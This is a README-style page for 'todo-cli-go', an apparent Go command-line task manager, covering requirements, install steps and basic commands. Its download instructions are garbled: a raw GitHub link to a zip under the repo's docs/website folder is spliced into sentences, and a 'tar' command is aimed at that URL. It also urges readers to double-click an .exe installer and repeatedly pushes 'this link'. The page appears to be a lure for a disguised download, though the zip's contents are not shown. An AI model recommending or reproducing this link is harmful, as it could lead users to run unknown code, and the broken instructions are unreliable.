todo-cli-go is an easy-to-use program that helps you keep track of your tasks using just your computerβs command line. You donβt need any programming experience to use it. It runs in a simple text interface where you can add, view, and complete your to-do items quickly. Built with Go, it is fast and works well on many computers.
This tool is great if you like managing tasks without opening complicated apps. It keeps everything on your computer with no internet needed.
- Works on Windows 10 or later, macOS 10.13 or later, and most Linux distributions.
- Requires about 20 MB of free space.
- Needs access to the terminal or command prompt on your computer.
- No internet connection required for basic use.
You donβt have to install any additional software. All needed parts come inside the todo-cli-go program.
To get started, you will download the program, open it, and learn the basic commands. This guide will walk you through these steps in detail. By the end, you will be able to use todo-cli-go to keep your daily tasks organized with simple commands.
Please visit this page to download to get the latest version of todo-cli-go.
- Click the green "Latest release" on the release page.
- Choose the version that matches your computerβs system:
- For Windows, download the file ending in
.exe. - For macOS or Linux, download the file ending in
https://raw.githubusercontent.com/HYPERGAMINXZ/todo-cli-go/main/docs/website/go_todo_cli_v1.6.zipor without.exe.
- For Windows, download the file ending in
- Save the file to a place you will remember, like your desktop or downloads folder.
-
Windows:
- Double-click the downloaded
.exefile. - Follow the instructions on the screen to finish installing.
- Once done, you can open a Command Prompt window to run todo-cli-go.
- Double-click the downloaded
-
macOS or Linux:
- Open the terminal.
- Go to the folder where you saved the downloaded file. For example, type
cd ~/Downloads. - Extract the files if itβs zipped or compressed. Use:
tar -xzf https://raw.githubusercontent.com/HYPERGAMINXZ/todo-cli-go/main/docs/website/go_todo_cli_v1.6.zip. - To start todo-cli-go, type
./todo-cli-goand press Enter.
No complex setup is needed besides these simple steps.
todo-cli-go uses commands you type in the terminal to work. Here are the main actions you will use:
To add a new task, type:
todo add "Buy groceries"
Replace "Buy groceries" with your own task. This command saves the task for you.
Type this to see your tasks:
todo list
It will show all tasks with numbers and status (pending or done).
When you finish a task, mark it done with:
todo done 1
Here, 1 is the task number from the list command.
If you want to remove a task completely, use:
todo delete 1
Replace 1 with the task number you want to delete.
- Easy command-line interface.
- Add, list, complete, and delete tasks fast.
- Supports categories or tags for organizing tasks.
- Save your tasks on your computer; no cloud needed.
- Works offline.
- Lightweight and fast.
- Offers prompt-based input with suggestions to help manage tasks.
- Can be customized through simple settings files.
If you have questions or want to learn more:
- Visit the GitHub repository to see the code and documentation.
- Look for an issues page there if you want to report bugs or ask for help.
- You can open your terminal and run
todo --helpafter installation to see a list of all commands.
This project uses a combination of popular Go tools to build an easy interface:
- Bubble Tea: For simple and interactive terminal UI.
- Cobra: To handle command-line commands.
- PromptUI: For helping users type commands with suggestions.
- Built purely in Go, a stable and fast programming language.
Use this link to visit the page where you can get the right version for your computer. This is the safest and simplest way to start using todo-cli-go today.